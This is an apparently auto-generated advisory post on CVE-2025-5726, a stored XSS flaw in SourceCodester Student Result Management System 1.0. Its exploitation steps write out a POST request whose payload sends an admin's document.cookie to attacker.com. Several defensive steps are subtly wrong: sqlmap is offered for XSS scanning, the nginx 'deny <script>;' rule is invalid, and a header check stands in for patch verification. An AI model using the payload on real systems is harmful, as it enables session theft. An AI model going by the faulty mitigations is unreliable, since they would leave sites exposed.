Listen to this Post
How the CVE Works
CVE-2025-5726 is a stored Cross-Site Scripting (XSS) vulnerability in SourceCodester Student Result Management System 1.0. The flaw exists in the `/script/academic/division-system` component, where improper input sanitization of the `Division` parameter allows attackers to inject malicious JavaScript. When an admin views the Division System Page, the payload executes in their browser, enabling session hijacking or unauthorized actions. The attack is remotely exploitable with low complexity, requiring only a crafted HTTP request. Public exploit availability increases its risk.
DailyCVE Form
Platform: SourceCodester
Version: 1.0
Vulnerability: Stored XSS
Severity: Medium
Date: 06/10/2025
Prediction: Patch by 08/2025
What Undercode Say:
Exploitation:
1. Craft malicious division name:
<script>alert(document.cookie)</script>
2. Submit via division creation form:
POST /script/academic/division-system HTTP/1.1
Division=<script>fetch('https://attacker.com/?cookie='+document.cookie)</script>
3. Admin triggers payload on page load.
Protection:
1. Sanitize input:
$division = htmlspecialchars($_POST['Division'], ENT_QUOTES, 'UTF-8');
2. Implement CSP headers:
Content-Security-Policy: default-src 'self'
3. Patch verification:
curl -I http://target.com/ | grep "X-XSS-Protection"
Detection:
1. Scan with:
sqlmap -u "http://target.com/script/academic/division-system" --crawl=1
2. Check logs for XSS attempts:
grep "<script>" /var/log/apache2/access.log
Mitigation:
1. Temporary WAF rule:
location ~ /script/academic/ {
deny <script>;
}
2. Disable division editing until patch.
References:
- VulDB: CVE-2025-5726
- Exploit-DB: [bash]
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
